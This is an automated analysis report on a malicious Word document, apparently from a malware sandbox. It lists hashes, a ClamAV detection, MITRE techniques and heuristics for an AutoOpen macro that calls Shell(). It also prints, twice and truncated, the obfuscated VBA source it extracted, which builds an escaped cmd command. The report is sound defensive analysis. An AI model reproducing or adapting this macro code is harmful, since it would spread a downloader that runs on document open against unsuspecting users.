Office (OLE) malware analysis — malicious · f75e830a44998cfc

MALICIOUS

Office (OLE)

149.9 KB Created: 2018-09-25 07:49:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 6968960cfd622cbc3345be24455a8abd SHA-1: 50e8bfea8d64e4a69f5a4cccf3a18cf9860126f2 SHA-256: f75e830a44998cfcb588e17103f57edbcae3b64ab366f842403379d2b7897018

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro, which is a known indicator of malicious documents. The macro utilizes the Shell() function, a critical heuristic firing, to execute arbitrary commands. This strongly suggests the document is designed to download and execute a second-stage payload, a common technique for malware delivery.

Heuristics 7

ClamAV: Doc.Malware.Valyria-6923105-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6923105-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 144341 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	144341 bytes
SHA-256: `a60764157c934ac072cc8e979bda8798f3a504d8e9b13e72e7f51336313ce59e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "YccAYYw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim TDITmq(1) TDITmq(0) = MidB(jTEfnHQ + wldYuDCjzjDCZjOVAB + Nwwdwji, 355, 506) + MidB(SjGBY + QFqijmBGHtvhDQcwrHS + JJoOSSf, 799, 739) + MidB(OqfPQru + ZfMzqfYcrwwDJZXjocDIla + lNfANp, 612, 149) + Right(oXmbGNvz + jGsXTpuVWbSFLwriI + vaEzw, 235) Dim NmnBjf(2) NmnBjf(0) = MidB(jCAll + PuTWuQQdniKTOcYfI + blZqnKj, 155, 730) + MidB(FpFcpbZK + NCUDqoXNGzSizEdsk + OXMdO, 731, 759) + Mid(wTcNj + zwskYJnLnusWvnMowrMw + QABNBEw, 842, 358) + Mid(sldEknSa + aKhioBvIkzqAIJmLvADPWtC + MDuXKop, 805, 381) NmnBjf(1) = Mid(CDjXwu + UuzcIrvWvKolSLwcfLSTSjw + RjSbqROp, 293, 523) + Right(OtTuJqb + mjHSWZCbvMLCdqcUEWjPCwQ + YJqUwAiz, 224) + MidB(sLNkfa + PcSasiVFQEHDCUF + BzrQZd, 531, 871) + Right(kccECWGj + SfYiHOlILQZiFlBBOjl + jbtBE, 637) Dim HiwWaI(1) HiwWaI(0) = MidB(PqlzfKt + lkEijjjSCfuMjbSEJnqds + pAPdViWH, 373, 937) + Right(YzPEL + qCKKiAsMGvGMSjqlhzXE + XctGuji, 463) + MidB(wfqjcc + AXpikHiBaXfSwLYzjSXR + snLqVIFF, 265, 77) + Right(srEzLhEA + wiKVEJrdGHhrrjSSaEuI + jujGqM, 662) Dim SYOWaR(2) SYOWaR(0) = Left(hvJwjlC + wwiVDIbQBFzqCpVjdXRSK + wUWEPGhC, 879) + MidB(cPPmFZ + lrthIqQSPjdTlNLwmzSnIiU + TrSrC, 338, 971) SYOWaR(1) = MidB(mNOwn + NTzqCEjKdtTElCnwtzoa + OJUjinLV, 5, 901) + MidB(WCPLHO + ftRkaloCpYszDnivqiz + rSGHiipZ, 40, 584) MObNHzIsOUwjBA (KeyString(cjzDcvWa + LzDDTAm + 0 + 0 + 11 + 10 + 46 + BEaSD + ZkntYTG) + LjOpfi + KHhqjm + KeyString(AFklCNw + VlnoIsts + 0 + 0 + 12 + 11 + 54 + UXsdT + Iwqst) + bIwUdCu + IuzoME + OdLhrkCaB + vojJJGBqYd + MajnTlQkm + bGdvOwUrWC + wLOhXK + kVwraYvXmCt + ZiMoDd + LLaiIjGnv + tNZFc + BEsVTfM + MwYXTI + kGwzWSKV + TPUzcT) Dim RwbcFs(2) RwbcFs(0) = Right(ifWzAp + YdHhhFLzYmDPbaVaUwIw + OSGwFM, 108) + Right(iRuIv + FijFwCHlWfOHkQfSmEZsL + JtRrSZPh, 863) RwbcFs(1) = Left(VULLKL + qBVRmOuYijmUZEitEFza + OKsHbtNJ, 589) + MidB(obfdYzqw + wvPSwjRirbiiYDBoScqjMEl + fHIciv, 333, 282) + Left(dMwfCwRK + ZWctJOGMDOMhBiwziGo + UcWwnlv, 889) + MidB(qJiPSkhK + aQfuhhSLOAlwhYSTbI + qLppTj, 279, 37) Dim hpasHf(2) hpasHf(0) = MidB(TzwqS + DbYwrLtUXumsNGToZf + wRSQwKXc, 103, 449) + MidB(XEUriD + UNsnsmsWiWnmjYvjizv + wvMImc, 201, 431) hpasHf(1) = Right(WkZfX + iGbAIfdoSjXMIdqwXiF + zDbOqH, 866) + MidB(LSpNOo + izJbzWwLwobYLHAEDYn + MFBqkL, 280, 56) Dim HBBCp(2) HBBCp(0) = Left(ZapwUSHu + KtEwcYZEYnnKXiFzv + EVCqm, 192) + Mid(IMSuPCYH + ddlLDlvownCwKHitlkOZRQ + kwIwXa, 385, 347) HBBCp(1) = MidB(tSQvLVC + QInQNNttODTvddjzQc + pYvQdqZs, 445, 345) + MidB(NzhuI + aDNHzoAhpEiinPSZkDTWjB + CMvlpH, 907, 35) Dim wGDwbO(2) wGDwbO(0) = MidB(cjbqFK + kMOraRGtjsswmwMEpVkwDNGf + zFiGcvBn, 84, 223) + Left(JIsWN + mOmGKtUALiUlVzNlUquYA + oLcEhz, 660) + Right(hNwTMHvl + qwfLSObDArqtFJXMd + wWQciuZ, 240) + Left(wawVJ + pYYiorafaHZwvEzI + jOCrEitL, 457) wGDwbO(1) = Right(INWEGHIQ + zTSNYwirVAFUVnjXz + CKqJC, 881) + Left(rsVokukd + vhjBvDtRkUYsbmsQOhEpui + fVQlJDZ, 47) Dim zIksAh(1) zIksAh(0) = Left(iKEvaR + GNjMBrQPtULLAhsuQaPAXd + WVQfk, 940) + Right(BTUwI + dHMPFcSAhXcCMiuhuO + kOEvjS, 514) + Left(ZZltKOA + CPzMUEOnlBazmbBBivAal + cFUBU, 886) + Right(MiQXt + sKpuLcnziMzwpMbRc + FQHYwZ, 922) End Sub Attribute VB_Name = "BPmQlAEcSAt" Function bIwUdCu() rZHwwKPoBF = "d" + " " + CStr(Chr(3 + 6 + 7 + 8 + 23)) + "V^" + ":" LciRSjSmf = "^" + "O" + "N" + CStr(Chr(3 + 6 + 7 + 8 + 23)) + "C" + CStr(Chr(2 + 4 + 5 + 5 + 18)) + "^" + "s^" + "e" + "^" + "t " + "^~" rkhJYLpswoE = "^" + "{=" + "1^" + "9" + "^" + "0" + "^ " + "^1" + "5^" + "3" hiSwLCWMJA = " 9" + "^1" + "^5" + " " + "0^" + "3" + "1^" XNDMAjCG = " ^" + "0" + "^5" + "^" + "9^" + " " + "^5" + "^" + "0" ctitnXYYz = "9^" + " " + "^" + "19" + "3" + "^" + " " + "5" + "^" + "31" UiNXZfbjpw = " ^" + "0" + "^3" + "^5" + " 0" + "^9" + "^1" + " 1" + "^" + "0" tbEdRkHvo = "9^" + " " + "^" + "5" + "^9" + "^1" + " 0" + "^3" + "1" + ... (truncated)

SHA-256: a60764157c934ac072cc8e979bda8798f3a504d8e9b13e72e7f51336313ce59e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "YccAYYw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim TDITmq(1)
TDITmq(0) = MidB(jTEfnHQ + wldYuDCjzjDCZjOVAB + Nwwdwji, 355, 506) + MidB(SjGBY + QFqijmBGHtvhDQcwrHS + JJoOSSf, 799, 739) + MidB(OqfPQru + ZfMzqfYcrwwDJZXjocDIla + lNfANp, 612, 149) + Right(oXmbGNvz + jGsXTpuVWbSFLwriI + vaEzw, 235)
   Dim NmnBjf(2)
NmnBjf(0) = MidB(jCAll + PuTWuQQdniKTOcYfI + blZqnKj, 155, 730) + MidB(FpFcpbZK + NCUDqoXNGzSizEdsk + OXMdO, 731, 759) + Mid(wTcNj + zwskYJnLnusWvnMowrMw + QABNBEw, 842, 358) + Mid(sldEknSa + aKhioBvIkzqAIJmLvADPWtC + MDuXKop, 805, 381)
NmnBjf(1) = Mid(CDjXwu + UuzcIrvWvKolSLwcfLSTSjw + RjSbqROp, 293, 523) + Right(OtTuJqb + mjHSWZCbvMLCdqcUEWjPCwQ + YJqUwAiz, 224) + MidB(sLNkfa + PcSasiVFQEHDCUF + BzrQZd, 531, 871) + Right(kccECWGj + SfYiHOlILQZiFlBBOjl + jbtBE, 637)
   Dim HiwWaI(1)
HiwWaI(0) = MidB(PqlzfKt + lkEijjjSCfuMjbSEJnqds + pAPdViWH, 373, 937) + Right(YzPEL + qCKKiAsMGvGMSjqlhzXE + XctGuji, 463) + MidB(wfqjcc + AXpikHiBaXfSwLYzjSXR + snLqVIFF, 265, 77) + Right(srEzLhEA + wiKVEJrdGHhrrjSSaEuI + jujGqM, 662)
   Dim SYOWaR(2)
SYOWaR(0) = Left(hvJwjlC + wwiVDIbQBFzqCpVjdXRSK + wUWEPGhC, 879) + MidB(cPPmFZ + lrthIqQSPjdTlNLwmzSnIiU + TrSrC, 338, 971)
SYOWaR(1) = MidB(mNOwn + NTzqCEjKdtTElCnwtzoa + OJUjinLV, 5, 901) + MidB(WCPLHO + ftRkaloCpYszDnivqiz + rSGHiipZ, 40, 584)
MObNHzIsOUwjBA (KeyString(cjzDcvWa + LzDDTAm + 0 + 0 + 11 + 10 + 46 + BEaSD + ZkntYTG) + LjOpfi + KHhqjm + KeyString(AFklCNw + VlnoIsts + 0 + 0 + 12 + 11 + 54 + UXsdT + Iwqst) + bIwUdCu + IuzoME + OdLhrkCaB + vojJJGBqYd + MajnTlQkm + bGdvOwUrWC + wLOhXK + kVwraYvXmCt + ZiMoDd + LLaiIjGnv + tNZFc + BEsVTfM + MwYXTI + kGwzWSKV + TPUzcT)
   Dim RwbcFs(2)
RwbcFs(0) = Right(ifWzAp + YdHhhFLzYmDPbaVaUwIw + OSGwFM, 108) + Right(iRuIv + FijFwCHlWfOHkQfSmEZsL + JtRrSZPh, 863)
RwbcFs(1) = Left(VULLKL + qBVRmOuYijmUZEitEFza + OKsHbtNJ, 589) + MidB(obfdYzqw + wvPSwjRirbiiYDBoScqjMEl + fHIciv, 333, 282) + Left(dMwfCwRK + ZWctJOGMDOMhBiwziGo + UcWwnlv, 889) + MidB(qJiPSkhK + aQfuhhSLOAlwhYSTbI + qLppTj, 279, 37)
   Dim hpasHf(2)
hpasHf(0) = MidB(TzwqS + DbYwrLtUXumsNGToZf + wRSQwKXc, 103, 449) + MidB(XEUriD + UNsnsmsWiWnmjYvjizv + wvMImc, 201, 431)
hpasHf(1) = Right(WkZfX + iGbAIfdoSjXMIdqwXiF + zDbOqH, 866) + MidB(LSpNOo + izJbzWwLwobYLHAEDYn + MFBqkL, 280, 56)
   Dim HBBCp(2)
HBBCp(0) = Left(ZapwUSHu + KtEwcYZEYnnKXiFzv + EVCqm, 192) + Mid(IMSuPCYH + ddlLDlvownCwKHitlkOZRQ + kwIwXa, 385, 347)
HBBCp(1) = MidB(tSQvLVC + QInQNNttODTvddjzQc + pYvQdqZs, 445, 345) + MidB(NzhuI + aDNHzoAhpEiinPSZkDTWjB + CMvlpH, 907, 35)
   Dim wGDwbO(2)
wGDwbO(0) = MidB(cjbqFK + kMOraRGtjsswmwMEpVkwDNGf + zFiGcvBn, 84, 223) + Left(JIsWN + mOmGKtUALiUlVzNlUquYA + oLcEhz, 660) + Right(hNwTMHvl + qwfLSObDArqtFJXMd + wWQciuZ, 240) + Left(wawVJ + pYYiorafaHZwvEzI + jOCrEitL, 457)
wGDwbO(1) = Right(INWEGHIQ + zTSNYwirVAFUVnjXz + CKqJC, 881) + Left(rsVokukd + vhjBvDtRkUYsbmsQOhEpui + fVQlJDZ, 47)
   Dim zIksAh(1)
zIksAh(0) = Left(iKEvaR + GNjMBrQPtULLAhsuQaPAXd + WVQfk, 940) + Right(BTUwI + dHMPFcSAhXcCMiuhuO + kOEvjS, 514) + Left(ZZltKOA + CPzMUEOnlBazmbBBivAal + cFUBU, 886) + Right(MiQXt + sKpuLcnziMzwpMbRc + FQHYwZ, 922)
End Sub


Attribute VB_Name = "BPmQlAEcSAt"
Function bIwUdCu()
rZHwwKPoBF = "d" + " " + CStr(Chr(3 + 6 + 7 + 8 + 23)) + "V^" + ":"
LciRSjSmf = "^" + "O" + "N" + CStr(Chr(3 + 6 + 7 + 8 + 23)) + "C" + CStr(Chr(2 + 4 + 5 + 5 + 18)) + "^" + "s^" + "e" + "^" + "t " + "^~"
rkhJYLpswoE = "^" + "{=" + "1^" + "9" + "^" + "0" + "^ " + "^1" + "5^" + "3"
hiSwLCWMJA = " 9" + "^1" + "^5" + " " + "0^" + "3" + "1^"
XNDMAjCG = " ^" + "0" + "^5" + "^" + "9^" + " " + "^5" + "^" + "0"
ctitnXYYz = "9^" + " " + "^" + "19" + "3" + "^" + " " + "5" + "^" + "31"
UiNXZfbjpw = " ^" + "0" + "^3" + "^5" + " 0" + "^9" + "^1" + " 1" + "^" + "0"
tbEdRkHvo = "9^" + " " + "^" + "5" + "^9" + "^1" + " 0" + "^3" + "1" +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.